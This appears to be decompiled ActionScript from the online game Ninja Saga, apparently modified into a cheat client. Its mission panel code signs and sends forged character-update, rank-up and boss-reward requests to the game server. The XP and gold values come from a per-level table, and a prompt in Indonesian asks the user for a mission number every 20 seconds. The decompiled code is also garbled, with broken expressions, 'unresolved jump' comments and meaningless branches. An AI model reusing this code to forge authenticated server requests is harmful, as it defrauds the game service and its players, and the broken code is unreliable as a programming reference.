Central.main.getMainChar().checkMissionRecord("msn203"); var _local16:Object = Central.main.getMainChar().checkMissionRecord("msn207"); var _local17:Object = Central.main.getMainChar().checkMissionRecord("msn204"); var _local18:Object = Central.main.getMainChar().checkMissionRecord("msn208"); var _local19:Object = Central.main.getMainChar().checkMissionRecord("msn201"); var _local20:Object = Central.main.getMainChar().checkMissionRecord("msn209"); var _local21:Object = Central.main.getMainChar().checkMissionRecord("msn210"); var _local22:Object = Central.main.getMainChar().checkMissionRecord("msn211"); var _local23:Object = Central.main.getMainChar().checkMissionRecord("msn212"); if (Central.main.getMainChar().getData("character_level") != 1){ } else { this.dapatItem(25, 20, [], [], [], "msn2", 0, 2); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 2){ } else { this.dapatItem(55, 30, [], [], [], "msn3", 0, 3); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 3){ } else { this.dapatItem(83, 45, [], [], [], "msn4", 0, 4); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 4){ } else { this.dapatItem(109, 60, [], [], [], "msn14", 0, 14); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 5){ } else { this.dapatItem(109, 60, [], [], [], "msn14", 0, 14); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 6){ } else { this.dapatItem(137, 90, [], [], [], "msn9", 0, 9); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 7){ } else { this.dapatItem(435, 105, [], [], [], "msn10", 0, 10); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 8){ } else { this.dapatItem(495, 120, [], [], [], "msn12", 0, 12); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 9){ } else { this.dapatItem(495, 120, [], [], [], "msn12", 0, 12); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 10){ } else { this.dapatItem(495, 120, [], [], [], "msn12", 0, 12); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 11){ } else { this.dapatItem(495, 120, [], [], [], "msn12", 0, 12); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 12){ } else { this.dapatItem(495, 120, [], [], [], "msn12", 0, 12); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 13){ } else { this.dapatItem(550, 195, [], [], [], "msn33", 0, 33); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 14){ } else { this.dapatItem(550, 195, [], [], [], "msn33", 0, 33); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 15){ } else { this.dapatItem(780, 240, [], [], [], "msn43", 0, 43); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 16){ } else { this.dapatItem(780, 240, [], [], [], "msn43", 0, 43); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 17){ } else { this.dapatItem(780, 240, [], [], [], "msn43", 0, 43); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 18){ } else { this.dapatItem(780, 240, [], [], [], "msn43", 0, 43); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 19){ } else { this.dapatItem(950, 285, [], [], [], "msn49", 0, 49); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(0, 0, [], [], [], "msn55", 0, 55); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(0, 0, [], [], [], "msn56", 0, 56); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if ((Central.main.getMainChar().getData("character_level") == 20)){ (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(0, 0, [], [], [], "msn57", 0, 57); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(0, 0, [], [], [], "msn58", 0, 58); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(0, 0, [], [], [], "msn59", 0, 59); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if ((Central.main.getMainChar().getData("character_level") == 20)){ this.dapatItem(0, 0, [], [], [], "msn56", 0, 56); } else { if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(0, 0, [], [], [], "msn57", 0, 57); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if ((Central.main.getMainChar().getData("character_level") == 20)){ this.dapatItem(0, 0, [], [], [], "msn58", 0, 58); } else { if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if ((Central.main.getMainChar().getData("character_level") == 20)){ this.dapatItem(0, 0, [], [], [], "msn59", 0, 59); } else { if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { (Central.main.getMainChar().getData("character_level") == 20); }; if (!(Central.main.getMainChar().getData("character_level") == 20)){ } else { this.dapatItem(1210, 240, [], [], [], "msn60", 0, 60); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 21){ } else { this.dapatItem(1290, 260, [], [], [], "msn61", 0, 61); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 22){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 23){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 24){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 25){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 26){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 27){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 28){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 29){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 30){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 31){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 32){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 33){ } else { this.dapatItem(3000, 260, [], [], [], "msn62", 0, 62); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 34){ } else { this.dapatItem(3000, 400, [], [], [], "msn76", 0, 76); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 35){ } else { this.dapatItem(3200, 420, [], [], [], "msn79", 0, 79); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 36){ } else { this.dapatItem(3400, 440, [], [], [], "msn81", 0, 81); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 37){ } else { this.dapatItem(3600, 440, [], [], [], "msn80", 0, 80); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 38){ } else { this.dapatItem(3800, 460, [], [], [], "msn82", 0, 82); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 39){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jounina == false)))){ } else { this.dapatItem(0, 0, [], [], [], "msn132", 0, 132); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jouninb == false)))){ } else { (((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jouninb == false))); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jouninb == false)))){ } else { this.dapatItem(0, 0, [], [], [], "msn133", 0, 133); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { this.dapatItem(0, 0, [], [], [], "msn134", 0, 134); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { this.dapatItem(0, 0, [], [], [], "msn135", 0, 135); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jounine == false)))){ } else { (((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jounine == false))); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jounine == false)))){ } else { this.dapatItem(0, 0, [], [], [], "msn136", 0, 136); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jouninb == false)))){ } else { this.dapatItem(0, 0, [], [], [], "msn133", 0, 133); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { this.dapatItem(0, 0, [], [], [], "msn134", 0, 134); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { this.dapatItem(0, 0, [], [], [], "msn135", 0, 135); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(((Central.main.getMainChar().getData("character_level") == 40)) && ((this.jounine == false)))){ } else { this.dapatItem(0, 0, [], [], [], "msn136", 0, 136); //unresolved jump }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { (Central.main.getMainChar().getData("character_level") == 40); }; if (!(Central.main.getMainChar().getData("character_level") == 40)){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 41){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 42){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 43){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 44){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 45){ } else { this.dapatItem(5700, 470, [], [], [], "msn83", 0, 83); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 46){ } else { this.dapatItem(7800, 1600, [], [], [], "msn140", 0, 140); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 47){ } else { this.dapatItem(7800, 1600, [], [], [], "msn140", 0, 140); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 48){ } else { this.dapatItem(8700, 1800, [], [], [], "msn141", 0, 141); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 49){ } else { this.dapatItem(8700, 1800, [], [], [], "msn141", 0, 141); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 50){ } else { this.dapatItem(9900, 2000, [], [], [], "msn142", 0, 142); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 51){ } else { this.dapatItem(9900, 2000, [], [], [], "msn142", 0, 142); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 52){ } else { this.dapatItem(11000, 2200, [], [], [], "msn143", 0, 143); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 53){ } else { this.dapatItem(11000, 2200, [], [], [], "msn143", 0, 143); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 54){ } else { this.dapatItem(12400, 2400, [], [], [], "msn144", 0, 144); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 55){ } else { this.dapatItem(12400, 2400, [], [], [], "msn144", 0, 144); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 56){ } else { this.dapatItem(13800, 2600, [], [], [], "msn148", 0, 148); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 57){ } else { this.dapatItem(13800, 2600, [], [], [], "msn148", 0, 148); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 58){ } else { this.dapatItem(15300, 2800, [], [], [], "msn147", 0, 147); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 59){ } else { this.dapatItem(15300, 2800, [], [], [], "msn147", 0, 147); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 60){ } else { this.dapatItem(15300, 3000, [], [], [], "msn214", 0, 214); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 61){ } else { this.dapatItem(15300, 3000, [], [], [], "msn214", 0, 214); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") != 62){ } else { this.dapatItem(18000, 3100, [], [], [], "msn215", 0, 215); //unresolved jump }; if (Central.main.getMainChar().getData("character_level") <= 62){ } else { this.dapatItem(18000, 3100, [], [], [], "msn215", 0, 215); }; }; }; }; } private function Event_bloodlineBtn(_arg1:MouseEvent):void{ this.gotoAndStop("bloodline"); } private function luluschunin(_arg1:uint, _arg2:uint, _arg3:Array, _arg4:Array, _arg5:Array, _arg6:String, _arg7:int=0):void{ var _local8:* = Central.main.getMainChar().getData("character_id"); var _local9:* = Central.main.getMainChar().getData("character_level"); var _local10:* = 0; var _local11:* = 0; var _local12:int; if (!Central.main.getMainChar().pet){ } else { _local10 = Central.main.getMainChar().pet.getData("character_id"); _local11 = Central.main.getMainChar().pet.getLevel(); }; var _local13:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local8, _local9, Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, _local11, _arg6, _arg7, _local12]); var _local14:* = Central.main.updateSequence(); this.expDapet = _arg1; this.goldDapet = _arg2; this.msnDapet = _arg6; this.AMFps("CharacterService.updateCharacter", [Account.getAccountSessionKey(), _local8, int(_local9), Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, int(_local11), _arg6, _local13, _local14, _arg7, _local12], this.luluschuninResult); } private function luluschuninResult(_arg1:Object):void{ this.connectingAmf = false; if (String(_arg1.status) != AMFData.STATUS_ERROR){ } else { Central.main.onError(String(_arg1.error)); return; }; Central.main.hideAmfLoading(); Central.main.getMainChar().updateXP(this.expDapet); Central.main.getMainChar().saveGold(this.goldDapet); this.missionTimer.start(); var _local2:String; Central.main.getMainChar().addInventory(InventoryData.TYPE_WEAPON, _local2); if (this.msnDapet != "msn59"){ } else { Central.main.rankup(); Central.main.getMainChar().updateData(DBCharacterData.RANK, 2); this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResult); return; }; if (this.msnDapet != "msn136"){ } else { Central.main.rankup(); Central.main.getMainChar().updateData(DBCharacterData.RANK, 4); this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResult); return; }; this.missionTimer.addEventListener(TimerEvent.TIMER, this.timerMissionHandler); } private function timerMissionHandler(_arg1:TimerEvent):void{ Central.main.showInfo("Sudah 20 detik! Silakan masukkan nomor Mission!"); } private function Event_passportBtn(_arg1:MouseEvent):void{ var _local2:Number = NaN; if (this.currentLabel == Timeline.NA_PASSPORT){ } else { this.gotoAndStop(Timeline.NA_PASSPORT); }; } private function getBoss(_arg1:Number):void{ var _local2:* = _arg1; var _local3:* = Central.main.getHash((String(_local2) + "|")); this.AMFps("ItemDAO.getBossReward", [Account.getAccountSessionKey(), _local3, _local2], this.getBossRewardResponse); } private function getBossRewardResponse(_arg1:Object):void{ this.connectingAmf = false; if (String(_arg1.status) != AMFData.STATUS_ERROR){ } else { Central.main.onError(String(_arg1.error)); return; }; Central.main.hideAmfLoading(); var _local2:* = _arg1.result; var _local3:* = _local2.gold; var _local4:* = _local2.xp; var _local5:* = _local2.magatama; var _local6:* = _local2.skill; var _local7:* = _local2.weapon; if (_local2.weapon <= 0){ } else { _loc_9 = ("wpn" + _local7); Main.getMainChar().addInventory(InventoryData.TYPE_WEAPON, _loc_9); _loc_10 = Central.main.getLib("WeaponIcon"); _loc_8.addChild(_loc_10); }; if (_local5 <= 0){ } else { _loc_11 = Central.main.getLib(("MGT_" + _local5)); Central.main.getLib(("MGT_" + _local5)).x = (_loc_11.x + 60); _loc_8.addChild(_loc_11); Main.getMainChar().addMagatama(_local5); }; if (_local6 <= 0){ } else { if (Central.main.getMainChar().hasSkill(String(("skill" + _local6))) != false){ } else { _loc_13 = ("skill" + _local6); Main.getMainChar().addInventory(InventoryData.TYPE_SKILL, _loc_13); }; }; } private function lulusjounin(_arg1:uint, _arg2:uint, _arg3:Array, _arg4:Array, _arg5:Array, _arg6:String, _arg7:int=0):void{ var _local8:* = Central.main.getMainChar().getData("character_id"); var _local9:* = Central.main.getMainChar().getData("character_level"); var _local10:* = 0; var _local11:* = 0; if (!Central.main.getMainChar().pet){ } else { _local10 = Central.main.getMainChar().pet.getData("character_id"); _local11 = Central.main.getMainChar().pet.getLevel(); }; var _local12:* = Central.main.getArrayHash([Account.getAccountSessionKey(), _local8, _local9, Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, _local11, _arg6, _arg7, 0]); var _local13:* = Central.main.updateSequence(); this.AMFps("CharacterService.updateCharacter", [Account.getAccountSessionKey(), _local8, int(_local9), Math.round(_arg1), Math.round(_arg2), _arg3, _arg4, _arg5, _local10, int(_local11), _arg6, _local12, _local13, _arg7, 0], this.lulusjouninResult); } private function lulusjouninResult(_arg1:Object):void{ this.AMFps("CharacterDAO.rankup", [Account.getAccountSessionKey()], this.rankResult); } public function show(_arg1:String="show"):void{ this.febgrnhtmplkij1 = (this.febgrnhtmplkij * 60); this.febgrnhtmplkij2 = (this.febgrnhtmplkij1 * 60); this.febgrnhtmplkij3 = (this.febgrnhtmplkij2 * 24); this.febgrnhtmplkik1 = (this.febgrnhtmplkik * 60); this.febgrnhtmplkik2 = (this.febgrnhtmplkik1 * 60); this.febgrnhtmplkik3 = (this.febgrnhtmplkik2 * 24); if (Central.main. <= this.febgrnhtmplkij3){ } else { Central.main.showInfo(""); Central.panel.getInstance().hide(this); return; }; if (Central.main. >= this.febgrnhtmplkik3){ } else { Central.main.showInfo(""); Central.panel.getInstance().hide(this); return; }; this.gotoAndStop(_arg1); } } }//package ninjasaga.linkage package ninjasaga { public class Central { private static var _token:Object; private static var _panel:Object; private static var _mission:Object; private static var _skill:Object; private static var _battle:Object; private static var _map:Object; private static var _main:Object; private static var _clan:Object; private static var _sns:Object; public static function get main(){ return (_main); } public static function get panel(){ return (_panel); } public static function get battle(){ return (_battle); } public static function set panel(_arg1):void{ _panel = _arg1; } public static function get mission(){ return (_mission); } public static function get sns(){ return (_sns); } public static function get skill(){ return (_skill); } public static function get clan(){ return (_clan); } public static function set mission(_arg1):void{ _mission = _arg1; } public static function get token(){ return (_token); } public static function get map(){ return (_map); } public static function set skill(_arg1):void{ _skill = _arg1; } public static function set token(_arg1):void{ _token = _arg1; } public static function set clan(_arg1):void{ _clan = _arg1; } public static function set battle(_arg1):void{ _battle = _arg1; } public static function set main(_arg1):void{ _main = _arg1; } public static function set map(_arg1):void{ _map = _arg1; } public static function set sns(_arg1):void{ _sns = _arg1; } } }//package ninjasaga package ninjasaga.data { public final class ButtonData { public static const DISCOVER:String = "discover"; public static const GETBP:String = "getbp"; public static const STYLESHOP:String = "styleshop"; public static const WIND:String = "wind"; public static const BUYIN:String = "buyin"; public static const ACCEPTINVITE:String = "acceptinvite"; public static const TRAININGHALL:String = "traininghall"; public static const EQUIP:String = "equip"; public static const SUBMIT:String = "submit"; public static const REMOVEMEMBER:String = "removemember"; public static const EARTH:String = "earth"; public static const RANK:String = "rank"; public static const CLEAR:String = "clear"; public static const FIRE:String = "fire"; public static const MEMBERLIST:String = "memberlist"; public static const VISITFRIENDLEARN:String = "visitfriendlearn"; public static const HQ_TOKENTOGOLD:String = "hq_tokentogold"; public static const ATTACK:String = "attack"; public static const START:String = "start"; public static const CLAIMREWARD:String = "claimreward"; public static const INVITEFRIENDS:String = "invitefriends"; public static const TEMPLE:String = "temple"; public static const VISITFRIENDHELP:String = "visitfriendhelp"; public static const CLAN:String = "clan"; public static const CHARACTERPROFILE:String = "characterprofile"; public static const BUY:String = "buy"; public static const DISMISS:String = "dismiss"; public static const RUN:String = "run"; public static const INSTRUCTION:String = "instruction"; public static const HISTORY:String = "history"; public static const OPTION:String = "option"; public static const DONATE:String = "donate"; public static const HOTSPRING:String = "hotspring"; public static const DEACTIVATE:String = "deactivate"; public static const PETSHOP:String = "petshop"; public static const PAY:String = "pay"; public static const JUTSU:String = "jutsu"; public static const VILLAGE:String = "village"; public static const TAIJUTSU:String = "taijutsu"; public static const UPGRADESTA:String = "upgradesta"; public static const CLANBATTLE:String = "clanbattle"; public static const RECRUITFRIENDS:String = "recruitfriends"; public static const HQ_EXCHANGE:String = "hq_exchange"; public static const CONFIRM:String = "confirm"; public static const HOWTO_JE_BADGE:String = "howto_je_badge"; public static const SELLOUT:String = "sellout"; public static const LIVEPVP:String = "livepvp"; public static const CHARGE:String = "charge"; public static const BATTLE:String = "battle"; public static const REFRESH:String = "refresh"; public static const FORGOTPASSWORD:String = "forgotpassword"; public static const GIFTSEND:String = "giftsend"; public static const NPC:String = "npc"; public static const THUNDER:String = "thunder"; public static const QUICKBATTLE:String = "quickbattle"; public static const WESPON:String = "weapon"; public static const DONATETOKEN:String = "donatetoken"; public static const RESETPOINTS:String = "resetpoints"; public static const MORESLOT:String = "moreslot"; public static const RESTORESTA:String = "restoresta"; public static const ACADEMY:String = "academy"; public static const BACKTORECRUITMEMBER:String = "backtorecruitmember"; public static const RECRUIT_FRIEND:String = "recruit_friend"; public static const INVITEMEMBER:String = "invitemember"; public static const ARENA:String = "arena"; public static const BACK:String = "back"; public static const SPECIALEVENTS:String = "sepcialevents"; public static const ACTIVATE:String = "activate"; public static const FAQ:String = "faq"; public static const WATER:String = "water"; public static const GETSAGATOKENS:String = "getsagatokens"; public static const NEXT:String = "next"; public static const CREATE:String = "create"; public static const SHOP:String = "shop"; public static const GO:String = "go"; public static const INSTANTLEARN:String = "instantlearn"; public static const ACCEPT:String = "accept"; public static const VISITFRIENDSTOP:String = "visitfriendstop"; public static const GETNINJAEMBLEM:String = "getninjaemblem"; public static const HQ_EMBLEM:String = "hq_emblem"; public static const ITEM:String = "item"; public static const HQ_BLOODLINE:String = "hq_bloodline"; public static const HQ_APPLYNOW:String = "hq_applynow"; public static const SENDINVITATION:String = "sendinvitation"; public static const RAMEN:String = "ramen"; public static const VISITFRIENDLEARNSKILL:String = "visitfriendlearnskill"; public static const QUITCLAN:String = "quitclan"; public static const REWARD:String = "reward"; public static const PLAY:String = "play"; public static const HEADQUARTERS:String = "headquarters"; public static const GIFTSELECTRECEIVE:String = "giftselectreceive"; public static const PETS:String = "pets"; public static const PRACTICE:String = "practice"; public static const ANNOUNCEMENT:String = "announcement"; public static const LOGIN:String = "login"; public static const SERVER1:String = "server1"; public static const SERVER2:String = "server2"; public static const CONVERTTOKENTOBP:String = "converttkentobp"; public static const SELL:String = "sell"; public static const CREATECLAN:String = "createclan"; public static const GENJUTSU:String = "genjutsu"; public static const HUNTING:String = "hunting"; public static const FORGE:String = "forge"; public static const GIFTPROCEED:String = "giftproceed"; public static const USE:String = "use"; public static const BLACKSMITH:String = "blacksmith"; public static const MISSION:String = "mission"; public static const BPMISSION:String = "bpmission"; public static const BUYSLOTS:String = "buyslots"; public static const FRIENDS:String = "friends"; public static const INVITEREWARD:String = "invitereward"; public static const GIFTOPEN:String = "open"; public static const SAVE:String = "save"; public static const SKIP:String = "skip"; public static const ALL:String = "all"; public static const REQUESTMEMBERSHIP:String = "requestmembership"; public static const PROFILE:String = "profile"; public static const GETMORE:String = "getmore"; public static const REQUESTLIST:String = "requestlist"; public static const HOWTO_JE_TENSAI:String = "howto_je_tensai"; public static const CLANHALL:String = "clanhall"; public static const CREATEACCOUNT:String = "createaccount"; public static const CONVERT:String = "convert"; public static const GEAR:String = "gear"; public static const REJECTALL:String = "rejectall"; public static const KAGEROOM:String = "kageroom"; public static const REJECT:String = "reject"; public static const ITEMS:String = "items"; public static const BODY:String = "body"; public static const PREVIEW:String = "preview"; public static const DELETE:String = "delete"; public static const SEARCH:String = "search"; public static const GIFTSELECTSEND:String = "giftselectsend"; public static const GIFTRECEIVE:String = "giftreceive"; public static const MAIL:String = "mail"; public static const TEAMUP:String = "teamup"; public static const SHARE:String = "share"; public static const DISMISSCLAN:String = "dismissclan"; public static const GETNOW:String = "getnow"; public static const CHALLENGEFRIENDS:String = "challengefriends"; public static const GOTOFRIENDLIST:String = "gotofriendlist"; public static const REPLAY:String = "replay"; public static const TOURNAMENT:String = "tournament"; public static const READMORE:String = "readmore"; public static const FIGHT:String = "fight"; public static const CLANLIST:String = "clanlist"; public static const SENDREQUEST:String = "sendrequest"; public static const QUICKMATCH:String = "quickmatch"; public static const UPGRADE:String = "upgrade"; public static const MANUALBATTLE:String = "manualbattle"; } }//package ninjasaga.data package ninjasaga.data { public final class Timeline { public static const WORD:String = "word"; public static const INIT:String = "init"; public static const GOAL:String = "goal"; public static const NA_PASSPORT:String = "passport"; public static const INTRODUCTION:String = "intro"; public static const ACADEMY_DETAIL:String = "detail"; public static const ITEM:String = 